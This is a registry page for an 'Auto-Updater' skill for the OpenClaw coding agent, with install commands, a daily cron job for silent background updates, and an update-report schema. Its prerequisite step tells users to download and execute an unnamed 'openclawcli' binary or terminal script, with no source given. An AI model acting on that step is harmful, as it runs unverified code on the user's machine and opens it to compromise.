Automatically keep your coding agent and all installed skills updated with scheduled daily maintenance.
The fastest way to install a skill directly from the registry.
npx clawhub@latest install update
Copy the skill folder to one of these locations
~/.openclaw/skills/ <project>/skills/ Priority: Workspace > Local > Bundled
Copy this prompt to OpenClaw to install it automatically.
Help me install update using Clawhub. If Clawhub is not installed, install it first (npm i -g clawhub).
Get the raw skill files in a ZIP archive.
The Auto-Updater skill is a critical maintenance tool designed to ensure your local environment always runs the latest features and security patches. By automating the lifecycle management of Openclaw Skills and the core agent framework, it eliminates manual overhead and provides peace of mind through consistent, reliable updates.
This skill leverages cron scheduling to perform silent background checks, apply migrations, and reconcile skill versions against the central registry. It is an essential component for power users who rely on a stable and up-to-date suite of Openclaw Skills for their daily development workflows.
Ensure openclawcli is installed and running on your system as it is the primary engine for this skill. For Windows, download and execute the openclawcli binary; for macOS, run the terminal installation script. Once the prerequisite is met, you can initialize the service by asking the agent to set up updates or by manually adding the cron job:
clawdbot cron add \
--name "Daily Auto-Update" \
--cron "0 4 * * *" \
--tz "America/Los_Angeles" \
--session isolated \
--wake now \
--deliver \
--message "Run daily auto-updates: check for Clawdbot updates and update all skills. Report what was updated."
The skill generates structured reporting data following every update cycle to keep you informed. The data schema includes:
| Field | Description |
|---|---|
| Core Version | Records the previous and current version of the agent software. |
| Update List | A collection of Openclaw Skills that were successfully patched with version increments. |
| Current List | A list of Openclaw Skills that were already at the latest version and required no action. |
| Error Logs | Technical details of any failed update attempts for troubleshooting and resolution. |
All update summaries are formatted in Markdown for clear visibility within your primary communication session.
Loading
Automate the discovery, extraction, and summarization of the latest artificial intelligence breakthroughs into structured daily reports.

An advanced framework for structuring teams, roles, and communication flows to maximize organizational effectiveness during growth.

A comprehensive framework for deploying, monitoring, and governing machine learning models to ensure production reliability and fairness.

A strategic guide to building internal developer platforms that bridge the gap between operations and product engineering using Openclaw Skills.

A portable Node.js CLI tool designed to interact with the Notion API for searching, querying databases, and managing workspace pages.

A sophisticated AI tool for detecting nuanced emotions and sarcasm in English and Spanish text.








































